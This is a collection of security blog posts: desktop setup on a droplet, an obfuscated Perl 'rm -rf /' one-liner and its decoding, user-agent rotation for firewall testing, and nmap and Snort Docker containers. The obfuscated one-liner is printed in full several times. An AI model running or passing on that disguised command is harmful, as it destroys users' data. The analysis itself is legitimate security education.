Ubuntu Remote Desktop On Digital Ocean

I use DigitalOcean for the majority of my testing, and from time to time I need a desktop environment to run some of my tools (like Burp). After spending much more time than I want to admit, I have it down to these 10 commands to bring up an Ubuntu + MATE + xrdp desktop on an Ubuntu Droplet:

# Update the base system, then install the MATE desktop and the xrdp server
sudo apt-get update && sudo apt-get dist-upgrade -y
sudo apt-get install --no-install-recommends ubuntu-mate-core ubuntu-mate-desktop -y
sudo apt-get install mate-core mate-desktop-environment mate-notification-daemon xrdp -y
# Create a non-root user for the RDP login and give it sudo rights
# ("admin" is the legacy group and may not exist on newer releases; "sudo" is the one that matters)
adduser burp
usermod -aG admin burp
usermod -aG sudo burp
# As that user, tell xrdp to start a MATE session, and copy the same default into /etc/skel for future users
su - burp
echo mate-session > ~/.xsession
sudo cp /home/burp/.xsession /etc/skel
sudo service xrdp restart

From there you can use any RDP viewer to connect to your droplet.


‘rm -rf /’ still works on OSX

Earlier this week someone sent me this one-line Perl script (that you shouldn't run):
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Due to some really clever code obfuscation, it runs rm -rf /.

You can deobfuscate it (is that a word?) with this:
perl -e 's;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;print "$_\n"'
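The same transliteration step, rebuilt in Python as an added example (not the author's code), so the payload can be read statically without Perl's eval ever running; the search and replacement lists are copied from the y;;; operator above:

```python
# Static decoder for the y/// (tr) step of the obfuscated Perl one-liner above.
# Added example: it expands Perl's character ranges into a Python translation
# table so the hidden command can be read without executing anything.

# Search and replacement lists copied from  y; -/:-@[-`{-};`-{/" -;  (delimiter ';')
TR_SEARCH = ' -/:-@[-`{-}'
TR_REPLACE = '`-{/" -'
# The string the one-liner first loads into $_ via  s;;=]=>%-{<-|}<&|`{;;
PAYLOAD = '=]=>%-{<-|}<&|`{'


def expand_ranges(spec: str) -> str:
    """Expand Perl tr-style ranges ('a-c' -> 'abc'); a trailing '-' is literal."""
    out, i = [], 0
    while i < len(spec):
        if i + 2 < len(spec) and spec[i + 1] == '-':
            lo, hi = ord(spec[i]), ord(spec[i + 2])
            out.extend(chr(c) for c in range(lo, hi + 1))
            i += 3
        else:
            out.append(spec[i])
            i += 1
    return ''.join(out)


def tr_decode(text: str, search: str = TR_SEARCH, replace: str = TR_REPLACE) -> str:
    """Apply the transliteration; Perl pads a short replacement list with its last char."""
    src, dst = expand_ranges(search), expand_ranges(replace)
    if len(dst) < len(src):
        dst = dst + dst[-1] * (len(src) - len(dst))
    return text.translate(str.maketrans(src, dst[:len(src)]))


if __name__ == '__main__':
    # Prints the command that the final  s;;$_;see  would hand to eval
    print(tr_decode(PAYLOAD))
```

Both lists expand to exactly 32 characters, which is why the mapping is one-to-one and the decoded text reads cleanly.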

While trying to figure out how this code works, I stumbled upon the fact that OS X does not require --no-preserve-root, which GNU Core Utilities has required since version 6.4, released in 2006.

Here is what happens if you run perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see' on Ubuntu 16.10:

Here is what happens if you run perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see' on macOS 10.12:


This seems like a pretty big oversight by the Apple team. I have filed a bug report but haven't heard anything yet.

WAF Testing With Random User Agents.

Recently I have been working with some NGFW tools that automatically detect and block someone who is scraping, brute forcing or "load testing" your website. I quickly ran into a problem: none of the tools I use would let me quickly change user agents, so I put together a couple of quick scripts that pick one of 7500 valid user agents from this file.

First I went with the old standby of curl, which does the job, but I was only able to do 10 requests in 4 seconds.

Here is what the output of curl.sh looks like:

That was not going to be fast enough for my testing needs, so I switched to Apache Bench and was able to do 1,000 requests in 2 seconds, which was what I needed for proper testing.

Here is what the output of ab.sh looks like:

All the scripts are in this GitHub Repo.
As always:  Use these for good, not bad.
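From the detection side, here is an added example (not from the author's repo) that scans web-server access log lines for a client that rotates user agents the way those scripts do, which is the behaviour the NGFW tools above are supposed to catch; the log lines are constructed sample data in the Apache/nginx "combined" format:

```python
import re
from collections import defaultdict

# Apache/nginx "combined" log format: client IP first, user agent in the last quoted field
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: 203.0.113.9 sends six requests with six different user agents
# (what a random-UA curl/ab loop looks like); 198.51.100.4 is an ordinary visitor.
SAMPLE_LOG = """\
203.0.113.9 - - [19/Oct/2016:21:15:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/49.0"
203.0.113.9 - - [19/Oct/2016:21:15:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Macintosh) Safari/602.1"
203.0.113.9 - - [19/Oct/2016:21:15:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux) Chrome/53.0"
203.0.113.9 - - [19/Oct/2016:21:15:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Opera/9.80 (Windows NT 6.1)"
203.0.113.9 - - [19/Oct/2016:21:15:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (iPhone) Mobile/14A403"
203.0.113.9 - - [19/Oct/2016:21:15:03 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 8.0)"
198.51.100.4 - - [19/Oct/2016:21:15:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux) Chrome/53.0"
198.51.100.4 - - [19/Oct/2016:21:15:05 +0000] "GET /about HTTP/1.1" 200 900 "-" "Mozilla/5.0 (X11; Linux) Chrome/53.0"
198.51.100.4 - - [19/Oct/2016:21:15:09 +0000] "GET /faq HTTP/1.1" 200 700 "-" "Mozilla/5.0 (X11; Linux) Chrome/53.0"
"""


def flag_ua_rotation(log_text, min_requests=5, max_ua_ratio=0.5):
    """Return {ip: distinct_ua_count} for clients whose user agent differs on
    more than max_ua_ratio of their requests, once they have sent min_requests."""
    uas_by_ip = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:                          # skip lines that are not combined format
            uas_by_ip[m['ip']].append(m['ua'])
    flagged = {}
    for ip, uas in uas_by_ip.items():
        distinct = len(set(uas))
        if len(uas) >= min_requests and distinct / len(uas) > max_ua_ratio:
            flagged[ip] = distinct
    return flagged


if __name__ == '__main__':
    print(flag_ua_rotation(SAMPLE_LOG))   # {'203.0.113.9': 6}
```

A real deployment would also bucket by time window, since the ab run above is 1,000 requests in 2 seconds and rate alone is a strong signal.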

RaiNmap Container

I use nmap all the time at work and recently came across rainmap-lite, an amazing web interface for nmap that lets you easily schedule scans and email the results. I wanted to be able to share it with a class I am teaching, so I did what I have been doing lately and put it into a Docker container:


Running it is as simple as:
docker run -ti -p 8080:8080 --name rainmap jgamblin/rainmap
Then access it in your browser on port 8080 of the Docker host.

You can now run a ton of nmap scans and get the results emailed to you and your team.

Here is the Dockerfile:
# Pinned to 16.04 (the original used ubuntu:latest in 2016): python-pip and the
# Python 2 Django/lxml stack this recipe installs are not in current Ubuntu releases.
FROM ubuntu:16.04
RUN apt-get update && apt-get install sqlite3 git nmap python-pip -y
RUN pip install --upgrade pip
RUN pip install lxml
RUN pip install Django
RUN git clone https://github.com/cldrn/rainmap-lite
WORKDIR /rainmap-lite/rainmap-lite/
ADD run.sh /rainmap-lite/rainmap-lite/run.sh
# executable, but not world-writable (the original used 777)
RUN chmod 755 /rainmap-lite/rainmap-lite/run.sh
CMD ./run.sh

Here is the run.sh:
#!/bin/bash
# rainmap-lite's web UI defaults to port 8000; point the cron job at the port we publish
sed -i "s/8000/8080/g" "nmaper-cronjob.py"
echo "What is your public IP address?"
read ip
# Assumption: nmaper-cronjob.py ships with 127.0.0.1 as the host in its base URL;
# check the file and adjust the pattern if it does not match
sed -i "s/127.0.0.1/$ip/g" "nmaper-cronjob.py"
echo "What is your SMTP user name?"
read user
sed -i "s/youremail@gmail.com/$user/g" "nmaper-cronjob.py"
echo "What is your SMTP password?"
# -s keeps the password off the terminal; it is still written in plain text into nmaper-cronjob.py,
# and a value containing / or & would break these sed expressions
read -s pass
sed -i "s/yourpassword/$pass/g" "nmaper-cronjob.py"
echo "What is your SMTP address?"
read smtp
sed -i "s/smtp.gmail.com/$smtp/g" "nmaper-cronjob.py"
python manage.py migrate
python manage.py loaddata nmapprofiles
python manage.py createsuperuser
# bind to all interfaces on the published port; runserver's default 127.0.0.1:8000
# is not reachable through -p 8080:8080
python manage.py runserver 0.0.0.0:8080 &
# poll for scheduled scans every 15 seconds
while true; do
    python nmaper-cronjob.py
    sleep 15
done

Protip: SendGrid offers a free SMTP server.

WebSnort Docker Container

One of the first things I like to do when I start looking at a PCAP during an investigation is run it through Snort to see if it finds anything suspicious. You can easily do this at the command line with snort -dv -r test.pcap, but the output is not great.

I have been using a tool called websnort for better output recently and decided it was time to put it into a Docker container for easy portability.


To run it:
docker run -d -p 8080:8080 jgamblin/websnort

If you want to build your own, the Dockerfile is:
# Pinned to 16.04 (the original used ubuntu:latest in 2016): python-pip is not in current Ubuntu releases
FROM ubuntu:16.04
# keep apt from prompting during the build
ENV DEBIAN_FRONTEND noninteractive
RUN apt-get update && apt-get install python-pip snort -y
# snort.conf is root-only by default; websnort has to be able to read it
RUN chmod a+r /etc/snort/snort.conf
RUN pip install websnort
CMD websnort

malware-traffic-analysis.net has great PCAPs for testing your security tools.